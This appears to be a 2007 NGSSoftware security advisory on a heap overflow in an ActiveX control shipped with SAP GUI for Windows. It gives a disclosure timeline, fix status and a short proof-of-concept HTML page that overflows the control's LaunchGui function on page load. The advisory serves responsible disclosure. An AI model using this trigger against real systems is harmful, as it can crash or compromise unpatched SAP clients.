<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2900.3132" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV><FONT face=Arial size=2>
<DIV>=======<BR>Summary<BR>=======<BR>Name: EnjoySAP, SAP GUI for Windows - Heap 
Overflow<BR>Release Date:&nbsp; 5 July 2007<BR>Reference: NGS00482<BR>Discover: 
Mark Litchfield &lt;<A 
href="mailto:mark@ngssoftware.com">mark@ngssoftware.com</A>&gt;<BR>Vendor: 
SAP<BR>Vendor Reference: SECRES-290<BR>Systems Affected: All ASCII 
Versions<BR>Risk: High<BR>Status: Fixed</DIV>
<DIV>&nbsp;</DIV>
<DIV>========<BR>TimeLine<BR>========<BR>Discovered:&nbsp; 4 January 
2007<BR>Released: 19 January 2007<BR>Approved: 29 January 2007<BR>Reported: 12 
January 2007<BR>Fixed: 27 March 2007<BR>Published: </DIV>
<DIV>&nbsp;</DIV>
<DIV>===========<BR>Description<BR>===========<BR>EnjoySAP, also know as Enjoy 
is the most popular SAP GUI used today.&nbsp; The<BR>latest version can be 
obtained from <A 
href="ftp://ftp.sap.com/pub/sapgui/win/">ftp://ftp.sap.com/pub/sapgui/win/</A></DIV>
<DIV>&nbsp;</DIV>
<DIV>When installing EnjoySAP, in appreciation of its vast size for being 
a<BR>client (around 500MB), there are an astounding 1102 ActiveX 
controls<BR>installed.</DIV>
<DIV>&nbsp;</DIV>
<DIV>A relatively brief examinaton of these controls, found a large number 
of<BR>instances that would terminate EnjoySAP process, there were a number 
that<BR>could create files on the file system (there unfortunately exists 
no<BR>ability to inject content into these created files) and a number 
of<BR>bufferoverruns.</DIV>
<DIV>&nbsp;</DIV>
<DIV>=================<BR>Technical Details<BR>=================<BR>Control - 
rfcguisink.rfcguisink.1</DIV>
<DIV>&nbsp;</DIV>
<DIV>Function - LaunchGui</DIV>
<DIV>&nbsp;</DIV>
<DIV>POC:</DIV>
<DIV>&nbsp;</DIV>
<DIV>&lt;HTML&gt;<BR>&lt;HEAD&gt;<BR>&lt;META http-equiv=Content-Type 
content="text/html; charset=windows-1252"&gt;<BR>&lt;SCRIPT 
type=text/javascript&gt;<BR>&nbsp;<BR>function init()<BR>{<BR>var foo = ""; 
<BR>&nbsp;<BR>for(var icount = 0; icount &lt; 1800; icount++) 
<BR>{&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <BR>&nbsp;foo = foo + 
"x";<BR>}<BR>var ngssoftware;<BR>ngssoftware = new 
ActiveXObject("rfcguisink.rfcguisink.1");<BR>&nbsp;<BR>ngssoftware["LaunchGui"](foo, 
1, 
1);<BR>}<BR>//--&gt;<BR>&lt;/SCRIPT&gt;<BR>&nbsp;<BR>&lt;/HEAD&gt;<BR>&lt;BODY 
bgColor=#ffffff onload=init()&gt;<BR>&lt;/BODY&gt;&lt;/HTML&gt;</DIV>
<DIV>&nbsp;</DIV>
<DIV>===============<BR>Fix Information<BR>===============<BR>Please ensure you 
are running the latest version</DIV>
<DIV>&nbsp;</DIV>
<DIV>NGSSoftware Insight Security Research<BR><A 
href="http://www.ngssoftware.com/">http://www.ngssoftware.com/</A><BR><A 
href="http://www.databasesecurity.com/">http://www.databasesecurity.com/</A><BR><A 
href="http://www.nextgenss.com/">http://www.nextgenss.com/</A><BR>+44(0)208 401 
0070 <BR></DIV></FONT></DIV></BODY></HTML>